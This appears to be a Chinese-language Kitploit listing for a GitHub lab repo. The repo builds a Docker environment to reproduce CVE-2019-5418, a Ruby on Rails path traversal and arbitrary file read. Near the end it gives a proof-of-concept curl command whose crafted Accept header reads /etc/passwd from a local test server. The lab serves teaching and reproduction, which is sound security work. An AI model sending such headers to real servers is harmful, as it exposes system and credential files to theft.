Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-5418 — WHS第3期张大赫的漏洞(CVE)Docker环境构建任务。 | Kitploit
工具/GitHubGitHub/daehyeok0618/cve-2019-5418
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubdaehyeok0618/cve-2019-5418

CVE-2019-5418

WHS第3期张大赫的漏洞(CVE)Docker环境构建任务。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-5418: Ruby on Rails 路径遍历与任意文件读取

本项目是一个用于实践和复现 Ruby on Rails 本地文件包含漏洞 (CVE-2019-5418) 的环境。该漏洞可通过 Accept 头进行路径遍历,从而读取服务器内部的任意文件。

漏洞概要

Ruby on Rails 是一个能让开发者快速轻松构建 Web 应用程序的 Web 应用框架。

Ruby on Rails 中版本低于 5.2.2.1、5.1.6.2、5.0.7.2、4.2.11.1 以及 v3 存在本地文件包含漏洞。

当在控制器中使用 render file 来渲染应用程序外部的视图时,Rails 会根据用户提供的 Accept 头来决定文件位置。发送带有特定值的 Accept 头(如 Accept: ../../../../../../../../etc/passwd{{),攻击者便可利用路径遍历漏洞读取任意文件。

环境配置

执行以下命令编译并启动 Ruby on Rails 5.2.2:

root@kitploit:~
docker compose build
docker compose up -d

服务器启动后,访问 http://your-ip:3000 即可看到 Ruby on Rails 页面。 image1

PoC 示例

root@kitploit:~
curl -H "Accept: ../../../../../../etc/passwd{{" http://localhost:3000/robots

image2 通过 Accept 头成功读取了服务器内部的任意文件。

下载工具